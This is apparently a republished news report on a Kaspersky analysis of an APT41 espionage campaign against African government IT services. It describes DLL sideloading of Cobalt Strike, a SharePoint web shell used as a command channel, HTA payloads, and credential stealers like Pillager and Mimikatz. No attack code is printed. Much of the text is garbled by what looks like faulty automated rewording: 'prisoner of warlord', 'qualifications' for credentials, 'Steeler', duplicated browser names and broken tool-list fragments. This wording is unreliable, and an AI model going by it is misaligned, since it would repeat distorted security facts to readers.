The China-related cyberspy group, tracked as APT41, is attributed to a new campaign targeting government IT services in the African region.
“The attackers used internal services, IP addresses, and hard coding names for proxy servers embedded within the malware,” said Kaspersky researchers Denis Kulik and Daniil PogoreLov. “One of the C2S [command-and-control servers] It was a prisoner of warlord within the victim’s infrastructure. ”
APT41 is a moniker assigned to China’s nation-state hacking group known for targeting organizations across multiple sectors, including telecoms and energy providers, educational institutions, healthcare organizations and more than three dozen energy companies.
What is noteworthy about the campaign is that, as Russian cybersecurity vendors have pointed out, it focuses on Africa, which has “experienced the most active” from this particular threat actor. That said, the findings line up with previous observations from Trend Micro that the continent has discovered in its crosshairs since late 2022.
Kaspersky said the investigation began after “suspecting activities” were found at several workstations associated with the unnamed organization’s IT infrastructure.
“It turns out that the cause of the suspicious activity is a compromised, unsupervised host,” the researchers noted. “Inpackets were executed in the context of the service account. After the ATEXEC and WMIEXEC modules were finished running, the attacker temporarily paused the operation.”
Soon after that, the attacker reportedly harvested the qualifications associated with the privileged account to promote privilege escalation and lateral movement, and eventually deployed a cobalt strike for C2 communication using the DLL sideload.
Malicious DLLs include checks to check the language packs installed on the host and to proceed with execution only if the following language packs are not detected: Japan, Korea (Korea), China (Mainland China), China (Taiwan).
This attack is also characterized by using a SharePoint server hacked for C2 purposes, which uses to send commands executed by C#-based malware uploaded to the victim host.
“They communicated and distributed files named Agents.exe and Agentx.exe via the SMB protocol with the server,” Kaspersky explained. “Each of these files is actually C# Trojan, the main feature of which is to run commands that are received from a web shell named CommandHandler.aspx installed on a SharePoint server.”
This method combines traditional malware deployment with stay tactics in which trustworthy services like SharePoint are transformed into secret control channels. These behaviors make it difficult to detect using only signature-based tools, in line with the techniques classified under Miter ATT&CK, including T1071.001 (Web Protocol) and T1047 (WMI).
Additionally, it was discovered that threat actors were carrying out subsequent activities on machines that were deemed valuable after the initial reconnaissance. This is done by running the cmd.exe command to download from an external resource, downloading a malicious HTML application (HTA) file containing embedded javascript, and using MSHTA.EXE.
The exact nature of payloads delivered via external URLs, Github (“github.githubassets[.]Net”) to avoid detection, currently unknown. However, one analysis of previously distributed scripts shows that it is designed to generate an inverse shell, which gives the attacker the ability to execute commands on the infected system.
Also used in the attack is a Steeler and Qualification Harvest utility that collects sensitive data and removes details through a SharePoint server. Some of the tools deployed by the enemy are listed below –
Pillager, although in a modified version, steals credentials from management utilities such as Browser, databases, and Mobaxterm. Source code. Screenshots; Chat sessions and data. Email Messages; SSH and FTP Sessions. A list of installed apps. Output of SystemInfo and task list commands. Check out your account information from chat apps and email clients to steal information about downloaded files and credit card data stored in web browsers such as Yandex, Opera, Opera, Vivaldi, Google Chrome, Brave, CốCCốC. rawcopy Copy raw registry file and dump account credentials to mimikatz
“Attackers are equipped with a wide range of both custom built and public tools,” says Kaspersky. “Specifically, we use penetration testing tools such as cobalt strikes at various stages of the attack.”
“Attackers can quickly adapt to the target infrastructure, update malicious tools to explain certain characteristics. They can also leverage internal services for C2 communication and data removal.”
This manipulation also highlights the blurry lines between the Red Team Tool and the real-world enemy simulation. Threat actors use public frameworks such as Inpacket, Mimikatz, and Cobalt along with custom implants. These overlap pose challenges for detection teams focusing on lateral movement, access to qualifications, and defence evasion across the window environment.
Source link
